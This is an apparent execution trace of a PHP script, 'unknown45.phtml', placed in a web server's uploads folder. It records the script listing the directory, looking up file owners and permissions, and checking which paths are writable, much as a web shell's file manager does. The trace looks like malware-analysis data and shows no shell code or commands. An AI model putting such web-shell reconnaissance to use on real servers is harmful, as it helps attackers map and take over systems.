3 18 0 0.001661 527040 getcwd 0 /var/www/html/uploads/unknown45.phtml 28 0
3 18 1 0.001674 527088
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/unknown45.phtml 28 $▚ = '/var/www/html/uploads'
3 19 0 0.001711 527088 is_writable 0 /var/www/html/uploads/unknown45.phtml 30 1 '/var/www/html/uploads'
3 19 1 0.001729 527128
3 19 R TRUE
2 17 1 0.001743 527104
2 17 R '<font color=\'green\'>drwxrwxrwx</font>'
2 20 0 0.001761 527000 getcwd 0 /var/www/html/uploads/unknown45.phtml 165 0
2 20 1 0.001774 527048
2 20 R '/var/www/html/uploads'
1 A /var/www/html/uploads/unknown45.phtml 165 $dir = '/var/www/html/uploads'
2 21 0 0.001799 527048 str_replace 0 /var/www/html/uploads/unknown45.phtml 167 3 '\\' '/' '/var/www/html/uploads'
2 21 1 0.001814 527144
2 21 R '/var/www/html/uploads'
1 A /var/www/html/uploads/unknown45.phtml 167 $dir = '/var/www/html/uploads'
2 22 0 0.001839 527048 explode 0 /var/www/html/uploads/unknown45.phtml 168 2 '/' '/var/www/html/uploads'
2 22 1 0.001853 527624
2 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/unknown45.phtml 168 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/unknown45.phtml 169 $i = 0
1 A /var/www/html/uploads/unknown45.phtml 169 $i++
2 23 0 0.001914 527552 scandir 0 /var/www/html/uploads/unknown45.phtml 517 1 '/var/www/html/uploads'
2 23 1 0.001946 528176
2 23 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'unknown45.phtml']
1 A /var/www/html/uploads/unknown45.phtml 517 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'unknown45.phtml']
2 24 0 0.001983 528144 getcwd 0 /var/www/html/uploads/unknown45.phtml 518 0
2 24 1 0.001996 528192
2 24 R '/var/www/html/uploads'
1 A /var/www/html/uploads/unknown45.phtml 518 $pa = '/var/www/html/uploads'
2 25 0 0.002021 528192 dirname 0 /var/www/html/uploads/unknown45.phtml 533 1 '/var/www/html/uploads'
2 25 1 0.002034 528272
2 25 R '/var/www/html'
2 26 0 0.002050 528192 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/.'
2 26 1 0.002065 528232
2 26 R 1676244176
2 27 0 0.002078 528144 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244176
2 27 1 0.002116 529312
2 27 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:56'
2 28 0 0.002144 529240 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 28 1 0.002158 529280
2 28 R TRUE
2 29 0 0.002171 529288 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/.'
2 29 1 0.002185 529328
2 29 R 0
2 30 0 0.002197 529240 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 0
2 30 1 0.002225 530040
2 30 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'root'
2 31 0 0.002277 529272 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 31 1 0.002291 529312
2 31 R TRUE
2 32 0 0.002304 529320 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/.'
2 32 1 0.002317 529360
2 32 R 0
2 33 0 0.002329 529272 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 0
2 33 1 0.002358 529928
2 33 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'root'
2 34 0 0.002404 529352 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/.'
2 34 1 0.002417 529392
2 34 R TRUE
2 35 0 0.002430 529360 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/..'
2 35 1 0.002446 529408
2 35 R 1676244175
2 36 0 0.002459 529312 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244175
2 36 1 0.002475 529640
2 36 R '2023-02-13 06:22:55'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:55'
2 37 0 0.002499 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 37 1 0.002513 529352
2 37 R TRUE
2 38 0 0.002526 529368 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/..'
2 38 1 0.002539 529408
2 38 R 0
2 39 0 0.002551 529312 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 0
2 39 1 0.002573 530112
2 39 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'root'
2 40 0 0.002624 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 40 1 0.002638 529352
2 40 R TRUE
2 41 0 0.002650 529368 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/..'
2 41 1 0.002663 529408
2 41 R 0
2 42 0 0.002675 529312 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 0
2 42 1 0.002696 529968
2 42 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'root'
2 43 0 0.002741 529368 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/..'
2 43 1 0.002755 529408
2 43 R TRUE
2 44 0 0.002768 529368 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/.htaccess'
2 44 1 0.002784 529408
2 44 R 1676244176
2 45 0 0.002797 529312 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244176
2 45 1 0.002813 529640
2 45 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:56'
2 46 0 0.002838 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 46 1 0.002851 529352
2 46 R TRUE
2 47 0 0.002864 529368 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/.htaccess'
2 47 1 0.002877 529408
2 47 R 0
2 48 0 0.002889 529312 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 0
2 48 1 0.002911 530112
2 48 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'root'
2 49 0 0.002961 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 49 1 0.002975 529352
2 49 R TRUE
2 50 0 0.002987 529368 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/.htaccess'
2 50 1 0.003011 529408
2 50 R 0
2 51 0 0.003024 529312 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 0
2 51 1 0.003046 529968
2 51 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'root'
2 52 0 0.003091 529368 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/.htaccess'
2 52 1 0.003105 529408
2 52 R FALSE
2 53 0 0.003123 529368 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/data'
2 53 1 0.003138 529408
2 53 R 1676244176
2 54 0 0.003151 529312 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244176
2 54 1 0.003167 529640
2 54 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:56'
2 55 0 0.003192 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 55 1 0.003205 529352
2 55 R TRUE
2 56 0 0.003217 529368 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/data'
2 56 1 0.003231 529408
2 56 R 0
2 57 0 0.003243 529312 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 0
2 57 1 0.003266 530112
2 57 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'root'
2 58 0 0.003316 529312 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 58 1 0.003330 529352
2 58 R TRUE
2 59 0 0.003343 529368 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/data'
2 59 1 0.003356 529408
2 59 R 0
2 60 0 0.003368 529312 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 0
2 60 1 0.003389 529968
2 60 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'root'
2 61 0 0.003434 529368 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/data'
2 61 1 0.003447 529408
2 61 R TRUE
2 62 0 0.003461 529368 is_writable 0 /var/www/html/uploads/unknown45.phtml 562 1 '/var/www/html/uploads/data'
2 62 1 0.003478 529408
2 62 R TRUE
2 63 0 0.003491 529368 p 1 /var/www/html/uploads/unknown45.phtml 564 1 '/var/www/html/uploads/data'
3 64 0 0.003504 529368 fileperms 0 /var/www/html/uploads/unknown45.phtml 66 1 '/var/www/html/uploads/data'
3 64 1 0.003517 529408
3 64 R 16895
2 A /var/www/html/uploads/unknown45.phtml 66 $p = 16895
2 A /var/www/html/uploads/unknown45.phtml 67 $i = 'u'
2 A /var/www/html/uploads/unknown45.phtml 72 $i = 'd'
2 A /var/www/html/uploads/unknown45.phtml 75 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 76 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 77 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 78 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 79 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 80 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 81 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 82 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 83 $i .= 'x'
2 63 1 0.003644 529408
2 63 R 'drwxrwxrwx'
2 65 0 0.003658 529368 is_writable 0 /var/www/html/uploads/unknown45.phtml 565 1 '/var/www/html/uploads/data'
2 65 1 0.003674 529408
2 65 R TRUE
2 66 0 0.003694 529488 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/prepend.php'
2 66 1 0.003744 529536
2 66 R 1676244176
2 67 0 0.003760 529432 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244176
2 67 1 0.003776 529760
2 67 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:56'
2 68 0 0.003801 529432 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 68 1 0.003815 529472
2 68 R TRUE
2 69 0 0.003828 529496 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/prepend.php'
2 69 1 0.003841 529536
2 69 R 0
2 70 0 0.003853 529432 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 0
2 70 1 0.003877 530232
2 70 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'root'
2 71 0 0.003934 529432 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 71 1 0.003948 529472
2 71 R TRUE
2 72 0 0.003960 529496 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/prepend.php'
2 72 1 0.003974 529536
2 72 R 0
2 73 0 0.003986 529432 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 0
2 73 1 0.004007 530088
2 73 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'root'
2 74 0 0.004052 529496 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/prepend.php'
2 74 1 0.004066 529536
2 74 R FALSE
2 75 0 0.004079 529496 filemtime 0 /var/www/html/uploads/unknown45.phtml 541 1 '/var/www/html/uploads/unknown45.phtml'
2 75 1 0.004094 529536
2 75 R 1676244176
2 76 0 0.004107 529432 date 0 /var/www/html/uploads/unknown45.phtml 541 2 'Y-m-d H:i:s' 1676244176
2 76 1 0.004123 529760
2 76 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 541 $dt = '2023-02-13 06:22:56'
2 77 0 0.004148 529432 function_exists 0 /var/www/html/uploads/unknown45.phtml 542 1 'posix_getpwuid'
2 77 1 0.004161 529472
2 77 R TRUE
2 78 0 0.004173 529496 fileowner 0 /var/www/html/uploads/unknown45.phtml 543 1 '/var/www/html/uploads/unknown45.phtml'
2 78 1 0.004187 529536
2 78 R 1000
2 79 0 0.004199 529432 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 543 1 1000
2 79 1 0.004228 530248
2 79 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 543 $downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 544 $downer = 'osboxes'
2 80 0 0.004282 529432 function_exists 0 /var/www/html/uploads/unknown45.phtml 548 1 'posix_getgrgid'
2 80 1 0.004296 529472
2 80 R TRUE
2 81 0 0.004308 529496 filegroup 0 /var/www/html/uploads/unknown45.phtml 549 1 '/var/www/html/uploads/unknown45.phtml'
2 81 1 0.004321 529536
2 81 R 1000
2 82 0 0.004334 529432 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 549 1 1000
2 82 1 0.004364 530088
2 82 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/unknown45.phtml 549 $dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/unknown45.phtml 550 $dgrp = 'osboxes'
2 83 0 0.004409 529496 is_dir 0 /var/www/html/uploads/unknown45.phtml 554 1 '/var/www/html/uploads/unknown45.phtml'
2 83 1 0.004423 529536
2 83 R FALSE
2 84 0 0.004437 529480 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/.'
2 84 1 0.004452 529504
2 84 R 1676244176
2 85 0 0.004464 529416 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244176
2 85 1 0.004480 529744
2 85 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:56'
2 86 0 0.004505 529720 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/.'
2 86 1 0.004519 529760
2 86 R FALSE
2 87 0 0.004532 529728 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/..'
2 87 1 0.004547 529776
2 87 R 1676244175
2 88 0 0.004560 529680 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244175
2 88 1 0.004575 530008
2 88 R '2023-02-13 06:22:55'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:55'
2 89 0 0.004600 529736 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/..'
2 89 1 0.004614 529776
2 89 R FALSE
2 90 0 0.004626 529736 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/.htaccess'
2 90 1 0.004642 529776
2 90 R 1676244176
2 91 0 0.004654 529680 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244176
2 91 1 0.004673 530008
2 91 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:56'
2 92 0 0.004698 529736 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/.htaccess'
2 92 1 0.004712 529776
2 92 R TRUE
2 93 0 0.004724 529680 function_exists 0 /var/www/html/uploads/unknown45.phtml 583 1 'posix_getpwuid'
2 93 1 0.004738 529720
2 93 R TRUE
2 94 0 0.004751 529736 fileowner 0 /var/www/html/uploads/unknown45.phtml 584 1 '/var/www/html/uploads/.htaccess'
2 94 1 0.004764 529776
2 94 R 0
2 95 0 0.004776 529680 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 584 1 0
2 95 1 0.004798 530480
2 95 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 584 $fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 585 $fowner = 'root'
2 96 0 0.004850 529712 function_exists 0 /var/www/html/uploads/unknown45.phtml 589 1 'posix_getgrgid'
2 96 1 0.004864 529752
2 96 R TRUE
2 97 0 0.004876 529768 filegroup 0 /var/www/html/uploads/unknown45.phtml 590 1 '/var/www/html/uploads/.htaccess'
2 97 1 0.004890 529808
2 97 R 0
2 98 0 0.004902 529712 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 590 1 0
2 98 1 0.004923 530368
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 590 $fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 591 $fgrp = 'root'
2 99 0 0.004969 530064 filesize 0 /var/www/html/uploads/unknown45.phtml 599 1 '.htaccess'
2 99 1 0.004984 530088
2 99 R 64
2 100 0 0.004997 530048 sz 1 /var/www/html/uploads/unknown45.phtml 599 1 64
2 A /var/www/html/uploads/unknown45.phtml 43 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/unknown45.phtml 44 $i = 0
3 101 0 0.005034 530048 round 0 /var/www/html/uploads/unknown45.phtml 45 2 64 2
3 101 1 0.005046 530120
3 101 R 64
2 100 1 0.005061 530080
2 100 R '64 B'
2 102 0 0.005075 529784 is_writable 0 /var/www/html/uploads/unknown45.phtml 602 1 '/var/www/html/uploads/.htaccess'
2 102 1 0.005092 529824
2 102 R FALSE
2 103 0 0.005106 529784 is_readable 0 /var/www/html/uploads/unknown45.phtml 603 1 '/var/www/html/uploads/.htaccess'
2 103 1 0.005121 529824
2 103 R TRUE
2 104 0 0.005135 529784 p 1 /var/www/html/uploads/unknown45.phtml 604 1 '/var/www/html/uploads/.htaccess'
3 105 0 0.005148 529784 fileperms 0 /var/www/html/uploads/unknown45.phtml 66 1 '/var/www/html/uploads/.htaccess'
3 105 1 0.005163 529840
3 105 R 33188
2 A /var/www/html/uploads/unknown45.phtml 66 $p = 33188
2 A /var/www/html/uploads/unknown45.phtml 67 $i = 'u'
2 A /var/www/html/uploads/unknown45.phtml 70 $i = '-'
2 A /var/www/html/uploads/unknown45.phtml 75 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 76 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 77 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 78 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 79 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 80 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 81 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 82 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 83 $i .= '-'
2 104 1 0.005291 529840
2 104 R '-rw-r--r--'
2 106 0 0.005305 529800 is_writable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/.htaccess'
2 106 1 0.005321 529840
2 106 R FALSE
2 107 0 0.005335 529800 is_readable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/.htaccess'
2 107 1 0.005351 529840
2 107 R TRUE
2 108 0 0.005365 529800 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/data'
2 108 1 0.005379 529840
2 108 R 1676244176
2 109 0 0.005393 529744 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244176
2 109 1 0.005409 530072
2 109 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:56'
2 110 0 0.005440 529800 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/data'
2 110 1 0.005453 529840
2 110 R FALSE
2 111 0 0.005466 529808 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/prepend.php'
2 111 1 0.005482 529856
2 111 R 1676244176
2 112 0 0.005494 529752 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244176
2 112 1 0.005510 530080
2 112 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:56'
2 113 0 0.005534 529816 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/prepend.php'
2 113 1 0.005548 529856
2 113 R TRUE
2 114 0 0.005560 529752 function_exists 0 /var/www/html/uploads/unknown45.phtml 583 1 'posix_getpwuid'
2 114 1 0.005574 529792
2 114 R TRUE
2 115 0 0.005586 529816 fileowner 0 /var/www/html/uploads/unknown45.phtml 584 1 '/var/www/html/uploads/prepend.php'
2 115 1 0.005600 529856
2 115 R 0
2 116 0 0.005612 529752 posix_getpwuid 0 /var/www/html/uploads/unknown45.phtml 584 1 0
2 116 1 0.005634 530552
2 116 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 584 $fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/unknown45.phtml 585 $fowner = 'root'
2 117 0 0.005686 529752 function_exists 0 /var/www/html/uploads/unknown45.phtml 589 1 'posix_getgrgid'
2 117 1 0.005699 529792
2 117 R TRUE
2 118 0 0.005712 529816 filegroup 0 /var/www/html/uploads/unknown45.phtml 590 1 '/var/www/html/uploads/prepend.php'
2 118 1 0.005725 529856
2 118 R 0
2 119 0 0.005737 529752 posix_getgrgid 0 /var/www/html/uploads/unknown45.phtml 590 1 0
2 119 1 0.005758 530408
2 119 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 590 $fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/unknown45.phtml 591 $fgrp = 'root'
2 120 0 0.005804 530072 filesize 0 /var/www/html/uploads/unknown45.phtml 599 1 'prepend.php'
2 120 1 0.005819 530088
2 120 R 57
2 121 0 0.005831 530048 sz 1 /var/www/html/uploads/unknown45.phtml 599 1 57
2 A /var/www/html/uploads/unknown45.phtml 43 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/unknown45.phtml 44 $i = 0
3 122 0 0.005868 530048 round 0 /var/www/html/uploads/unknown45.phtml 45 2 57 2
3 122 1 0.005880 530120
3 122 R 57
2 121 1 0.005894 530080
2 121 R '57 B'
2 123 0 0.005908 529792 is_writable 0 /var/www/html/uploads/unknown45.phtml 602 1 '/var/www/html/uploads/prepend.php'
2 123 1 0.005924 529832
2 123 R FALSE
2 124 0 0.005937 529792 is_readable 0 /var/www/html/uploads/unknown45.phtml 603 1 '/var/www/html/uploads/prepend.php'
2 124 1 0.005952 529832
2 124 R TRUE
2 125 0 0.005965 529792 p 1 /var/www/html/uploads/unknown45.phtml 604 1 '/var/www/html/uploads/prepend.php'
3 126 0 0.005978 529792 fileperms 0 /var/www/html/uploads/unknown45.phtml 66 1 '/var/www/html/uploads/prepend.php'
3 126 1 0.005993 529856
3 126 R 33261
2 A /var/www/html/uploads/unknown45.phtml 66 $p = 33261
2 A /var/www/html/uploads/unknown45.phtml 67 $i = 'u'
2 A /var/www/html/uploads/unknown45.phtml 70 $i = '-'
2 A /var/www/html/uploads/unknown45.phtml 75 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 76 $i .= 'w'
2 A /var/www/html/uploads/unknown45.phtml 77 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 78 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 79 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 80 $i .= 'x'
2 A /var/www/html/uploads/unknown45.phtml 81 $i .= 'r'
2 A /var/www/html/uploads/unknown45.phtml 82 $i .= '-'
2 A /var/www/html/uploads/unknown45.phtml 83 $i .= 'x'
2 125 1 0.006121 529856
2 125 R '-rwxr-xr-x'
2 127 0 0.006135 529816 is_writable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/prepend.php'
2 127 1 0.006151 529856
2 127 R FALSE
2 128 0 0.006168 529816 is_readable 0 /var/www/html/uploads/unknown45.phtml 605 1 '/var/www/html/uploads/prepend.php'
2 128 1 0.006183 529856
2 128 R TRUE
2 129 0 0.006197 529816 filemtime 0 /var/www/html/uploads/unknown45.phtml 581 1 '/var/www/html/uploads/unknown45.phtml'
2 129 1 0.006213 529856
2 129 R 1676244176
2 130 0 0.006225 529752 date 0 /var/www/html/uploads/unknown45.phtml 581 2 'Y-m-d H:i:s' 1676244176
2 130 1 0.006241 530080
2 130 R '2023-02-13 06:22:56'
1 A /var/www/html/uploads/unknown45.phtml 581 $ft = '2023-02-13 06:22:56'
2 131 0 0.006268 529816 is_file 0 /var/www/html/uploads/unknown45.phtml 582 1 '/var/www/html/uploads/unknown45.phtml'
2 131 1 0.006281 529856
2 131 R TRUE
2 132 0 0.006294 529752 function_exists 0 /var/www/html/uploads/unknown45.phtml 583 1 'posix_getpwuid'
2 132 1 0.006308 529792
2 132 R TRUE
2 133 0 0.006320 529816 fileowner 0 /var/www/html/uploads/unknown45.phtml 584 1 '/var/www/html/uploads/unknown45.phtml'
2 133 1 0.006334 529856
2 133 R 1000
